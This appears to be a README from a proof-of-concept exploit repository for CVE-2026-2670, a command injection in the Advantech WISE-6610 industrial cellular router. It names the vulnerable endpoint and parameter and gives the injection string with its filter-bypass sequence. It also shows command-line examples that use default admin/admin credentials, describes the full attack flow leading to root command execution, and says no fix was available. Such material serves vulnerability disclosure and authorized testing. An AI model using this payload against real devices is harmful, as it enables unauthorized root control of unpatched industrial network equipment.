# exploit-CVE-2026-2670  
## CVE-2026-2670 – Advantech WISE-6610 Command Injection PoC

Proof-of-concept exploit demonstrating a command injection vulnerability in the **Advantech WISE-6610** industrial cellular router.

The vulnerability exists in the `/cgi-bin/luci/admin/openvpn_apply` endpoint and allows an **authenticated attacker** to execute arbitrary system commands.

---

## 📌 Vulnerability Overview

The WISE-6610 web interface does not properly sanitize the `delete_file` parameter when processing OpenVPN configuration deletions.

An attacker with valid credentials can inject shell commands using a pipe (`|`) followed by a command and a terminating `echo$(IFS)` sequence to bypass input filtering.

Injected commands are executed with **root privileges**.

- **CVE ID:** CVE-2026-2670  
- **Vendor:** Advantech  
- **Product:** WISE-6610  
- **Fixed Version:** Not available at time of PoC release  

---

## ⚙️ Requirements

- Python 3.6+
- `requests` library

Install dependencies:

```bash
pip install requests
```
---
## 🔧 Options
Option	Description
```bash 
--target	Base URL of the device (e.g., http://192.168.1.100:8444)
--cmd	Command to execute. Must write output to a file inside the web root (e.g., id > output.txt)
--output	Web path to the output file (e.g., /output.txt). Must match filename used in --cmd
--cookie	(Optional) Existing sysauth session cookie value
--username	(Optional) Username for login
--password	(Optional) Password for login
--delay	Seconds to wait before retrieving output (default: 2)
--debug	Enable detailed request/response logging
```
---
## 🚀 Usage

The script supports two authentication methods:

Providing an existing sysauth session cookie

Logging in with a username and password

Basic Syntax
```bash 
python3 exploit.py --target <URL> --cmd <COMMAND> --output <OUTPUT_PATH> \
[--cookie <SYSCOOKIE> | --username <USER> --password <PASS>] \
[--delay <SECONDS>] [--debug]
```
---
## 🧪 Examples
1️⃣ Using a Pre-Authenticated Cookie
```bash 
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'id > output.txt' \
--cookie f417ce7d2d576017ff5fd81d7d5f555f \
--output /output.txt
```
2️⃣ Logging in with Credentials
```bash 
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'echo "pwned" > output.txt' \
--username admin \
--password admin \
--output /output.txt
```
3️⃣ With Debug Output
```bash 
python3 exploit.py \
--target http://192.168.1.100:8444 \
--cmd 'uname -a > output.txt' \
--username admin \
--password admin \
--output /output.txt \
--debug
```
---
## 🔍 How It Works
#### 1. Nonce Retrieval

```bash 
A GET request is sent to /cgi-bin/luci/ to obtain the luci_nonce cookie required for authentication.
```
#### 2. Authentication
```bash 
If credentials are provided, the script sends a POST request to /cgi-bin/luci/ with luci_username and luci_password to obtain a sysauth cookie.
```
If a valid cookie is supplied via --cookie, this step is skipped.

#### 3. Command Injection
```bash 
A POST request is sent to:

/cgi-bin/luci/admin/openvpn_apply

With the following parameters:

act=delete
delete_file=123123|<command> echo$(IFS)
openvpn_id=1

The echo$(IFS) sequence helps terminate the injected command and bypass input filters.
```
#### 4. Output Retrieval

```bash 
After a short delay, the script attempts to retrieve the generated file from the specified --output path.
```
---
## ⚠️ Disclaimer

This tool is provided for educational purposes and authorized security testing only.

Unauthorized use against systems you do not own or do not have explicit permission to test is illegal.

The authors assume no liability for misuse or damage caused by this software.
